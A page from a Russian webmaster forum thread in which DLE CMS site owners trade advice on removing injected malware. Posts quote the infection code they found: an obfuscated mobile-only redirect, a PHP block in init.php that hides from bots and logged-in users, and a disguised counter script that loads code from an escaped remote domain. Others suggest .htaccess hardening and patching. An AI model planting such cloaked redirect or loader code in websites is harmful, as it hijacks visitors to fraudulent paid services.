Форум Сайтостроение Безопасность

Вирус на сайте cms dle

1... 373839404142434445 ...61
OT
На сайте с 02.06.2011
Offline
22
O.Torvald
#401

Подскажите, где копать? На сайте вставили код, редиректит на мобильные платники: 

<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?3&seo"+"ref="+encodeURIComponent(document.referrer)+ "&para"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script>

Отображается он только в мобильных браузерах, перед <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML ....

Не могу найти как убрать с сайта эту заразу.

что за строчка в Команда злостных критиков разорвет Это для форума нужно?
siv1987
На сайте с 02.04.2009
Offline
427
siv1987
#402

Капайте в файлах, обязательно наткнетесь.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#403

Если перед <!doctype, читайте в прикрепленной теме, я написал способ найти вставку...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
seosniks
На сайте с 13.08.2007
Offline
389
seosniks
#404

Для запрета выполнения скриптв в папках, которые расположены в uploads создаете файлик

.htaccess

прописываете права 444

в файлик добавляете код ниже.

RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .wml

AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .wml .ag

Теперь все скрипты и файлы будут выводится в браузер в виде текстовых страничек.

В любые паапки где графика и нте выполнения PHP можно кидать подобный файлик.

Я так несколько сайтов закрыл от шеллов, они просто не работали.

Яндекс нашел вирус на Отвечу на ваши вопросы Общая тема о борьбе
B
На сайте с 07.05.2011
Offline
18
badu
#405

Видимо у всех различные способы, которыми вас взломали.

В каждом случае надо детально просмотреть и найти через что вас взломали.

Смотрите логи и даты изменения файлов.

Могу помочь если сами не знаете, что делать.

nop
Лог файлы, чем анализировать Взломали сайты DLE Пессимизация или чтото еще
Гаврила Бляблин
На сайте с 30.10.2012
Offline
54
Гаврила Бляблин
#406

и ставьте, ставьте заплатки с dle-news.

не забывайте простейшие правила безопасности, в том числе создавайте для каждого сайта на сервере отдельного пользователя.

полдня сегодня боролся с этой нечистью.

Ответы на все вопросы тут (http://google.com)
O
На сайте с 22.03.2013
Offline
23
olegptr
#407
O.Torvald:
Подскажите, где копать? На сайте вставили код, редиректит на мобильные платники: 
<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?3&seo"+"ref="+encodeURIComponent(document.referrer)+ "&para"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script>

Отображается он только в мобильных браузерах, перед <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML ....

Не могу найти как убрать с сайта эту заразу.

Вчера три часа убил на поиск и удаление аналогичной ерунды. Нашел ее в файле /engine/init.php.

У меня были две вставки. Первая: 

$shka=strrev('eld');

Вторая: 

$bot = 0; $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $bots = array('crawl', 'yande', 'googl', 'bot');

if( count($bots) ){foreach( $bots as $b ){if( strpos($userAgent, $b) !== FALSE ){$bot = 1; break;}}};

if ( check_smartphone() ) {if (($_SERVER['REQUEST_URI'] != '/') and (!isset ($_COOKIE['dle_user_id'])) and (!$bot))

{echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//"."dle".$shka.".net"."/user/id?3&seo\"+\"ref=\"+encodeURIComponent(document.referrer)+ \"&para\"+\"meter=$key\"+\"word&se=$se&ur=1&H"."TT"."P_REF"."ERER=\"+enc"."odeURIComponent(docu"."ment.URL));</s"."cript>";}

        if ( @is_dir ( ROOT_DIR . '/templates/smartphone' ) and ( $config['allow_smartphone'] )) {

            $config['skin'] = "smartphone";

            $smartphone_detected = true;

            $config['allow_comments_wysiwyg'] = "no";}}

if (!isset ( $do ) AND isset ($_REQUEST['do']) ) $do = totranslit ( $_REQUEST['do'] ); elseif(isset ( $do )) $do = totranslit ( $do ); else $do = "";

if (!isset ( $subaction ) AND isset ($_REQUEST['subaction']) ) $subaction = totranslit ($_REQUEST['subaction']); else $subaction = totranslit ($subaction);

if ( isset ($_REQUEST['doaction']) ) $doaction = totranslit ($_REQUEST['doaction']); else $doaction = "";

if ($do == "tags" AND !$_GET['tag']) $do = "alltags";

Тому, кто сделал это восхищенно аплодирую. Молодца! Даже имея опыт обнаружения подобных заражений, о его шедевре узнаешь не сразу и обнаруживаешь его с достаточным трудом.

Гаврила Бляблин:
и ставьте, ставьте заплатки с dle-news.

У меня все заплатки были установлены.

оявление постороннего кода в Просел доход на адсенс Когда сайт вернется в
F
На сайте с 24.07.2011
Offline
52
Fodas
#408
olegptr:
Вчера три часа убил на поиск и удаление аналогичной ерунды. Нашел ее в файле /engine/init.php.

Спасибо вам большое! Я бы искал еще дольше, но благодаря вам нашел быстро!🍿

Кстати, У меня тоже все заплатки были установлены. 🙅

exarh
На сайте с 28.03.2010
Offline
503
exarh
#409

Подломали DLE 9.8 в main вставили 

<!--LiveInternet counter--><script type="text/javascript">

<!--

var par0="counter.yadro.ru";

var u1 = unescape("%65%6C%62%72%75%73%2D%74%6F%70%2E%63%6F%6D");

var put = '?out=136302';

var fil = '5385';

document.write('<sc' + 'ript language="JavaScript" ' + 

'src="' +'http://'+ u1 + '/livein/index.php' + put + fil + '"></sc' + 

'ript>')

//--></script>

<!--/Liveinternet-->
Монетизируй (https://publishers.propellerads.com/#/pub/auth/signUp?ref_id=tnE) свой сайт с выгодой
O
На сайте с 22.03.2013
Offline
23
olegptr
#410
Fodas:
Спасибо вам большое! Я бы искал еще дольше, но благодаря вам нашел быстро!🍿

Хостинг виртуалка или VDS? Серверное ПО обновлялось?

На форуме DLE говорят, что ломают как раз через устаревшее программное обеспечение сервера.

1... 373839404142434445 ...61

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий